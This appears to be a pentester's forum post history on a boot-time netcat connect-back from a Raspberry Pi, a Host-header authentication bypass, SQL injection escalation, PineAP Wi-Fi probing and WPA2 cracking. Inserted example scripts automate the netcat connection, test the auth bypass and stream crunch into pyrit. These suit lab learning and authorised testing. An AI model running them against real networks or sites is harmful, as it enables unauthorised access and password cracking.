
bolus

Active Members
Posts: 55

Posts posted by bolus

  1. On 6/21/2018 at 11:12 PM, i8igmac said:

    I have experienced this same thing. I believe netcat starts up before your networking services are completely configured.

    What worked for me:

    sleep 15

    netcat . . . 192. 

    exit 0

    @i8igmac - you've cracked it! Added the sleep command and it's working a treat now. Thank you for your assistance and suggestions, really appreciate it.
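
A version of the reboot hook that waits for the network and for the listener instead of a fixed sleep, added here as an example rather than the poster's script. It keeps the listener address 192.168.1.215:443 and the -w 10 from the thread; the 60-second timeout, the script path /home/pi/scripts/boot_netcat.sh and the `run` argument on the crontab line are choices made for this example.

```sh
#!/bin/sh
# /home/pi/scripts/boot_netcat.sh   (added example; not the poster's script)
# crontab entry assumed:  @reboot /home/pi/scripts/boot_netcat.sh run
#
# @reboot jobs fire while the interfaces may still be unaddressed, so a fixed
# 'sleep 15' is a guess. This polls for the two conditions the sleep was
# covering: a kernel route to the listener, then the listener accepting.
LISTENER=${LISTENER:-192.168.1.215}   # the Kali laptop from the thread
PORT=${PORT:-443}
TIMEOUT=${TIMEOUT:-60}                # seconds to wait per condition (assumption)

# wait_until SECONDS CMD...: rerun CMD once a second until it succeeds or
# SECONDS elapse. Returns 0 on success, 1 on timeout.
wait_until() {
    limit=$1; shift
    deadline=$(( $(date +%s) + limit ))
    while ! "$@" >/dev/null 2>&1; do
        [ "$(date +%s)" -lt "$deadline" ] || return 1
        sleep 1
    done
}

# have_route HOST: true once the kernel can route to HOST, i.e. an interface
# is up and has an address (this is what the fixed sleep was waiting for).
have_route() { ip route get "$1"; }

# listener_up HOST PORT: true once the remote netcat listener accepts a TCP connect.
listener_up() { nc -z -w 1 "$1" "$2"; }

main() {
    if ! wait_until "$TIMEOUT" have_route "$LISTENER"; then
        logger -t boot_netcat "no route to $LISTENER after ${TIMEOUT}s"; exit 1
    fi
    if ! wait_until "$TIMEOUT" listener_up "$LISTENER" "$PORT"; then
        logger -t boot_netcat "$LISTENER:$PORT not listening after ${TIMEOUT}s"; exit 1
    fi
    # Same connect as the original script; -w 10 closes the session after 10s idle.
    exec nc "$LISTENER" "$PORT" -w 10
}

# Run only when invoked with 'run' (as in the crontab line above), so the file
# can also be sourced to reuse wait_until elsewhere.
case "${1:-}" in run) main ;; esac
```

Failures go to syslog via logger, which is where to look if the session still does not appear; a rule that never becomes true (typo in LISTENER, listener not started) then shows up as a timeout message rather than silence.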

  2. Thanks for the quick suggestion @i8igmac - appreciate it.

    Unfortunately, that hasn't worked. I've edited /etc/rc.local and added

    netcat 192.168.1.215 443 -w 10

    On reboot - nothing. If I run the command stand-alone, it connects fine, so I've ruled out a connectivity issue there.

    Could it be anything to do with the user that the Pi boots with? I've tried adding sudo in front of the netcat command - nothing.

    Any suggestions from you guys are appreciated.

  3. I'm trying a proof of concept whereby, when my Pi starts, it kicks off a netcat session with my Kali laptop.

    Setup:

    Kali laptop (192.168.1.215): netcat -lvp 443

    Pi (192.168.1.217):

    I have the script boot_netcat.sh (and ran chmod +x on it):

    #!/bin/bash

    netcat 192.168.1.215 443 -w 10

    In crontab I have added:

    @reboot /home/pi/scripts/boot_netcat.sh

    When I reboot the Pi, the script isn't run. I've tried adding sudo to the script and also to the crontab entry - still no joy.

    I've also tried this by ensuring cron is run at boot via /etc/rc.local:

    /etc/init.d/cron start

    And still nothing. If I run ps aux | grep cron I can see cron running. If I run the script on its own, it executes and connects to my Kali laptop netcat listener.

    I'm sure it's something very simple that I'm not doing or not seeing - any suggestions as to what the problem is, or is there a better way to do this?

    Thanks in advance

  4. I've got a page where the content access is restricted by a username/password combination. It's not credentials that the user has to register for; it's just set on the server, where all content is publicly accessible apart from this page. I've found that I can access this by changing the Host header value (via Burp).

    Original:

    GET /content HTTP/1.1

    Host: site.com

    which returns HTTP 401 Authorization Required.

    I change the header details to:

    GET /content HTTP/1.1

    Host: evil.com

    then I can access the requested page. I kinda stumbled across this, and would like to learn more about it - any advice as to what this type of vulnerability is called, and why it happens? I *think* that it's happening due to the validation only working when the request comes from the host domain, but would like confirmation of this.

    Cheers
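
A command-line check for the behaviour described in this post, added here as an example and not taken from the post or its replies. It sends the same request twice to the server's address, once with the real Host header and once with a name that no virtual host should claim, and reports a bypass when the protected path stops answering 401. The usual cause of what is described above is that the authentication rule is attached to one named virtual host, and an unrecognised Host falls through to the server's default virtual host, which serves the same document root without that rule; the page does not confirm this, so treat it as the hypothesis to test. The names site.com and /content come from the post; the server address 192.0.2.10 (a documentation address) and the hostname nonexistent.invalid are placeholders chosen here.

```sh
#!/bin/sh
# Added example; not from the original post. Point BASE at the server's IP so
# that the Host header, not DNS, decides which virtual host answers.

# status_for_host BASE PATH HOST: fetch BASE+PATH with an explicit Host header
# and print only the HTTP status code ('000' if the connection failed).
status_for_host() {
    curl -s -o /dev/null -w '%{http_code}' --max-time 10 -H "Host: $3" "$1$2"
}

# check_host_bypass BASE PATH REAL_HOST: compare the status for the real Host
# against one for a name no vhost can legitimately serve (.invalid is reserved
# for exactly this, RFC 2606). Prints BYPASS when the real Host gets 401 but
# the bogus one gets 200, ERROR when a request failed, OK otherwise. The two
# raw statuses go to stderr so the verdict alone is on stdout.
check_host_bypass() {
    base=$1; path=$2; real=$3; bogus=nonexistent.invalid
    real_status=$(status_for_host "$base" "$path" "$real")
    bogus_status=$(status_for_host "$base" "$path" "$bogus")
    printf 'Host: %-24s -> %s\n' "$real" "$real_status" "$bogus" "$bogus_status" >&2
    if [ "$real_status" = 000 ] || [ "$bogus_status" = 000 ]; then
        echo ERROR
    elif [ "$real_status" = 401 ] && [ "$bogus_status" = 200 ]; then
        echo BYPASS
    else
        echo OK
    fi
}

# Usage (placeholder address): sh hostcheck.sh check http://192.0.2.10 /content site.com
case "${1:-}" in check) shift; check_host_bypass "$@" ;; esac
```

A BYPASS result means the 401 depends on the Host value rather than on the path, which is what the Burp experiment above showed; the fix on the server side is to apply the authentication rule to the resource on every virtual host, including the default one, or to refuse requests whose Host names no configured site.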

  5. When you're running the OSINT and passive part of your engagement, what's the typical order of tools that you tend to run through?

    dig, Fierce, DNSRecon

    Google hacks, Shodan, Netcraft, BuiltWith

    theHarvester

    Recon-ng, OSINT Framework

    Nikto

    Skipfish

    HTTrack, Burp Suite

    etc. etc.

    How do you structure your part of a pen test?

  6. On 02/09/2016 at 8:01 AM, bored369 said:

    In the latest episode (8/31/16 air date) the ducky was used for pretty much a whole segment of the show and in the spot light.  It was really well done but they did leave one portion to mess people up if someone tries to do exactly what they did in the episode with the ducky.

     

    I've not watched this yet; what did they mess up? Was it intentional so that viewers have to find out for themselves, or was it an oversight?

  7. I'm learning my way through SQLi, and wondered what, typically, the next steps are after I've:

    1. Identified a vulnerability

    2. Via SQLi, listed the DB, user, tables, columns, column contents, etc.

    3. Identified that the user is not sysadmin (on a MySQL system)

    Where does one typically go next with identifying further information, and ultimately escalating privileges? I'm not after a step-by-step, hold-my-hand approach, more a general "this is the order I tend to do things in", as I know everyone has a different approach.

    Thanks in advance

  8. Why save the output?

    Crunch spits out the generated sequence to try; the result is yes or no, and you know there's only going to be one yes, which just happens to be the only one you're interested in.

    So your need isn't storage space, it's processing power. Correct?

    Sorry, I worded my question rather vaguely. I don't have a lot at home in terms of processing power, so am thinking that an AWS GPU solution might be the way to go.

    Thanks for your quick response

  9. Hi all.

    I've got a WPA2 handshake to crack; I know the format is 8 characters, upper-case A-Z and 0-9. I was thinking of using an AWS GPU instance to pipe Crunch output into Pyrit GPU, as I don't have masses of storage space to save the output. Does this sound like a feasible option, or can you think of a better way?

    Cheers
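
The pipeline proposed above with a keyspace and runtime estimate in front of it, added here as an example rather than the poster's commands. The character set and length are from the post; handshake.cap and the 100,000 PMK/s placeholder rate are assumptions, and the rate should be replaced with what `pyrit benchmark` reports on the GPU instance before any money is spent. Pyrit's attack_passthrough reads its candidates from the file given with -i, and '-' there means standard input, so nothing is written to disk.

```sh
#!/bin/sh
# Added example; not the poster's commands.
CHARSET=ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789   # upper-case A-Z and 0-9, from the post
LENGTH=8
HANDSHAKE=${HANDSHAKE:-handshake.cap}           # assumption: capture holding the 4-way handshake
RATE=${RATE:-100000}                            # placeholder PMK/s; replace with 'pyrit benchmark' output

# keyspace_size ALPHABET_SIZE LENGTH: number of candidates crunch will emit
# (ALPHABET_SIZE ** LENGTH, by repeated multiplication so it stays POSIX sh).
keyspace_size() {
    n=1; i=0
    while [ "$i" -lt "$2" ]; do
        n=$(( n * $1 )); i=$(( i + 1 ))
    done
    echo "$n"
}

# eta_days KEYSPACE RATE: whole days needed to exhaust KEYSPACE at RATE PMK/s.
eta_days() { echo $(( $1 / $2 / 86400 )); }

# run_attack: stream candidates from crunch straight into pyrit. crunch writes
# one candidate per line to stdout; pyrit reads them from stdin via '-i -'.
run_attack() {
    crunch "$LENGTH" "$LENGTH" "$CHARSET" \
        | pyrit -r "$HANDSHAKE" -i - attack_passthrough
}

case "${1:-}" in
    estimate)
        ks=$(keyspace_size "${#CHARSET}" "$LENGTH")
        echo "keyspace: $ks candidates; about $(eta_days "$ks" "$RATE") days at $RATE PMK/s"
        ;;
    run) run_attack ;;
esac
```

With the defaults, `sh crack.sh estimate` reports 2,821,109,907,456 candidates, roughly 326 days at 100,000 PMK/s; that is the number to weigh against the instance's hourly price before starting. If the instance is stopped part-way, crunch's -s option resumes from a given starting string instead of regenerating from the beginning.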

  10. If you've got time to prepare whilst other presentations are on, why not run a recon as close to the clients as you can get, and try to identify their devices. Then you can log the probes that their devices are making, and set up PineAP with some of their SSIDs, omitting any other probes - that way you keep it targeted to the client and show them that they can be singled out pretty easily. Might be worth finding out if there are any legal issues with this before you embark.

  11. The changes I make (via my Nano front end) to the landing page are saved into /etc/pineapple/landingpage.php

    This is the page that I see when I connect to PineAP with my phone. The images and other PHP files that my landing page uses are called from /www/

    So, it's all working, but is the landing page being stored in the correct location?

  12. My thoughts: I believe while your devices (iOS and Mac systems) are already connected they will not probe. I also believe that it depends on the manufacturer's Wi-Fi supplicant. For example: your Apple devices may be coded to probe less often than, say, your neighbour's Wi-Fi card.

    Sounds valid, thanks for feeding back.

    Some further info: my devices are connected to my local Wi-Fi network, not the PineAP. I've looked at the MAC addresses of some of the devices broadcasting from my neighbours, and if the results are to be believed, a device vendor search shows some of them as Apple devices too.

    I'll play around more and report back.

  13. Q: Just lately I've noticed that when running PineAP, my mobile devices (iOS, Mac OS) aren't probing much. When I check the logs, I see that my neighbours' devices, and other devices where I'm scanning, are making far more probes. I'd have expected the local/stronger-signal devices to make the probes, especially as they've been more prevalent with their probing in the past.

    Any thoughts?

  14. Might be of use to those running an iOS device, and hence with no tethering: I've picked up an LG Leon for £50 from EE. It's PAYG and EE allow tethering; some network operators block PAYG tethering.

    Just tested the Pineapple app and tethering, all good.

    I don't work for EE, just passing the info on. The phone itself is very unremarkable.

    Looking forward to playing around with the Nano on my commute now!

    *edit: it's an Android device

  15. Just got my NANO and I'm really enjoying tinkering... but the WiFi signal doesn't seem to be as strong as I had hoped. I'm not picking up as many APs as it seems I should when driving.

    Out of interest, what are your expectations? I'm (very) new to Pineapple, and went for a drive through my local high street the other day with the Nano sat on the front seat; I was really impressed by the 46 different SSIDs and 21 associations that were made in a 5-minute pootle through the town. Maybe I was lucky and managed to drive through a very SSID-heavy area.
